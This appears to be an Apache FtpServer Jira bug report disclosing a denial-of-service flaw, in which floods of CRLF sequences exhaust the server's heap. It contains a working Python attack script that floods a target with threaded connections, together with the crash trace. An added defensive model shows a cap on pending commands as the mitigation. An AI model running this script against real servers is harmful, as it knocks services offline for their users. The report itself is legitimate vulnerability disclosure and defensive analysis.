Posted to dev@mina.apache.org by "Ardu (Jira)" <ji...@apache.org> on 2022/12/10 12:28:00 UTC

[jira] [Updated] (FTPSERVER-517) The memory of FtpServer can be easily filled up, causing a DoS threat

     [ https://issues.apache.org/jira/browse/FTPSERVER-517?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Ardu updated FTPSERVER-517:
---------------------------
    Description: 
Hi, I found that the memory of FtpServer can be easily filled up with a lot of "\r\n" sequences. Sending a long sequence containing a lot of "\r\n" to the server can easily exhaust the server's Java heap space and make the server unavailable. It seems there is an issue in the memory control and command processing. This may be a threat that could be exploited by attackers to perform a DoS attack.
 
A similar threat is CVE-2017-7651 [https://bugs.eclipse.org/bugs/show_bug.cgi?id=529754].

Note that simply sending the server a long sequence of arbitrary characters other than "\r\n" does not cause the same condition.
h2. Attack simulation
h3. run server

 
{code:bash}
bin/ftpd.sh
{code}
 
h3. run attack script

The attack script (in Python) looks like this:
{code:python}
import socket
import threading
import time

ip_address = "0.0.0.0"
port = 12345
payload = b"\r\n" * 1000000  # work
# payload = b"aa" * 1000000  # not work

def send_attack():
    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    soc.connect((ip_address, port))
    soc.sendall(payload)
    soc.close()

while True:
    for i in range(50):
        t = threading.Thread(target=send_attack, daemon=True)
        t.start()
    time.sleep(1)
{code}
h2. Result

The server becomes unavailable and outputs the following:
{code:java}
Exception in thread "pool-1-thread-39" java.lang.OutOfMemoryError: Java heap space
        at java.nio.HeapByteBuffer.<init>(HeapByteBuffer.java:57)
        at java.nio.ByteBuffer.allocate(ByteBuffer.java:335)
        at org.apache.mina.core.buffer.SimpleBufferAllocator.allocateNioBuffer(SimpleBufferAllocator.java:42)
        at org.apache.mina.core.buffer.SimpleBufferAllocator.allocate(SimpleBufferAllocator.java:34)
        at org.apache.mina.core.buffer.IoBuffer.allocate(IoBuffer.java:235)
        at org.apache.mina.core.buffer.IoBuffer.allocate(IoBuffer.java:218)
        at org.apache.mina.core.polling.AbstractPollingIoProcessor.read(AbstractPollingIoProcessor.java:508)
        at org.apache.mina.core.polling.AbstractPollingIoProcessor.access$1200(AbstractPollingIoProcessor.java:68)
        at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.process(AbstractPollingIoProcessor.java:1224)
        at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.process(AbstractPollingIoProcessor.java:1213)
        at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.run(AbstractPollingIoProcessor.java:683)
        at org.apache.mina.util.NamePreservingRunnable.run(NamePreservingRunnable.java:64)
        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
        at java.lang.Thread.run(Thread.java:750)

{code}
 

  was: the same description as above, without the "Note that ..." sentence about payloads of characters other than "\r\n".


> The memory of FtpServer can be easily filled up, causing a DoS threat
> ---------------------------------------------------------------------
>
>                 Key: FTPSERVER-517
>                 URL: https://issues.apache.org/jira/browse/FTPSERVER-517
>             Project: FtpServer
>          Issue Type: Bug
>          Components: Core, Server
>    Affects Versions: 1.2.0
>         Environment: docker Ubuntu 20.04.3 LTS
> FtpServer version 1.2.0
> java version "1.8.0_341"
> Java(TM) SE Runtime Environment (build 1.8.0_341-b10)
> Java HotSpot(TM) 64-Bit Server VM (build 25.341-b10, mixed mode)
>            Reporter: Ardu
>            Priority: Major
>         Attachments: apacheftp_atk.py
>
>

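As an added illustration (not code from this report, from FtpServer or from MINA), the Python model below shows the defender-side point behind the two payloads in the report: a reader that limits bytes per line still accepts an unbounded number of empty lines, because each "\r\n" completes a line and queues one more command object, while a connection that never sends "\r\n" is cut off by the line-length limit. The mechanism it models (one queued command per delimiter, with the network outpacing the command executor) is an assumption for the sake of the example, not a statement about the exact code path in FtpServer; `CommandReader`, `simulate`, `PendingCommandOverflow` and the sample payloads are all constructed here. The mitigation it demonstrates is a per-connection cap on pending commands that stops reading (or closes the session) when exceeded.

```python
"""Model of a CRLF-delimited command reader with and without a cap on
pending commands per connection.  Constructed illustration for the CRLF
flood described in FTPSERVER-517; not FtpServer/MINA code, and the
per-line queuing it assumes is a simplification of any real server."""
from collections import deque

CRLF = b"\r\n"


class PendingCommandOverflow(Exception):
    """Raised when one connection has more unprocessed commands than allowed."""


class CommandReader:
    """Splits a byte stream on CRLF and queues each complete line as a command.

    max_line_length bounds the bytes held for an incomplete line (the usual
    protection against long-line floods).  max_pending bounds the number of
    complete-but-unprocessed commands; None leaves it unbounded, which is the
    weak setting this example is about.
    """

    def __init__(self, max_line_length=1024, max_pending=None):
        self.max_line_length = max_line_length
        self.max_pending = max_pending
        self.pending = deque()       # complete lines waiting for the executor
        self.dropped_lines = 0       # over-long lines discarded
        self._partial = bytearray()  # bytes of the line still being received
        self._discarding = False     # inside an over-long line, skipping to CRLF

    def feed(self, chunk: bytes) -> None:
        self._partial += chunk
        while True:
            idx = self._partial.find(CRLF)
            if idx < 0:
                break
            line = bytes(self._partial[:idx])
            del self._partial[:idx + len(CRLF)]
            if self._discarding:
                # Tail of an over-long line: drop it and resume normal parsing.
                self._discarding = False
                continue
            self._enqueue(line)
        # No CRLF yet and the partial line is too long: discard it instead of
        # buffering without bound.  This stops the "aa..." payload but does
        # nothing against a stream of empty lines, whose partial is always empty.
        if len(self._partial) > self.max_line_length:
            self._partial.clear()
            if not self._discarding:
                self._discarding = True
                self.dropped_lines += 1

    def _enqueue(self, line: bytes) -> None:
        # Every CRLF costs one queued object, even when the line is empty.
        if self.max_pending is not None and len(self.pending) >= self.max_pending:
            raise PendingCommandOverflow(
                f"{len(self.pending)} commands pending, limit {self.max_pending}")
        self.pending.append(line)

    def buffered_bytes(self) -> int:
        return len(self._partial)


def simulate(payload: bytes, max_pending=None, chunk_size=4096) -> dict:
    """Feed payload to a reader in socket-sized chunks with no consumer draining
    the queue (the executor is assumed to be slower than the network)."""
    reader = CommandReader(max_pending=max_pending)
    overflowed = False
    for off in range(0, len(payload), chunk_size):
        try:
            reader.feed(payload[off:off + chunk_size])
        except PendingCommandOverflow:
            overflowed = True  # a real server would stop reading or close the session here
            break
    return {
        "pending": len(reader.pending),
        "buffered_bytes": reader.buffered_bytes(),
        "dropped_lines": reader.dropped_lines,
        "overflowed": overflowed,
    }


# Constructed sample payloads, scaled down from the report's 1,000,000 repeats.
CRLF_FLOOD = CRLF * 100_000   # the payload the report says works
FILLER = b"aa" * 100_000      # the payload the report says does not


if __name__ == "__main__":
    print("unbounded, CRLF flood :", simulate(CRLF_FLOOD))
    print("unbounded, filler     :", simulate(FILLER))
    print("capped at 64, CRLF    :", simulate(CRLF_FLOOD, max_pending=64))
```

With no cap, the CRLF flood leaves 100,000 queued commands while holding zero bytes of partial line, and the filler payload leaves nothing queued because the line-length limit discards it; with `max_pending=64` the reader stops accepting input after 64 queued commands. The stack trace in the report shows the allocation that finally fails is in the read path, which is consistent with the heap having already been consumed elsewhere, so a cap of this kind has to be enforced where lines are completed and queued, before the read path runs out of memory.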

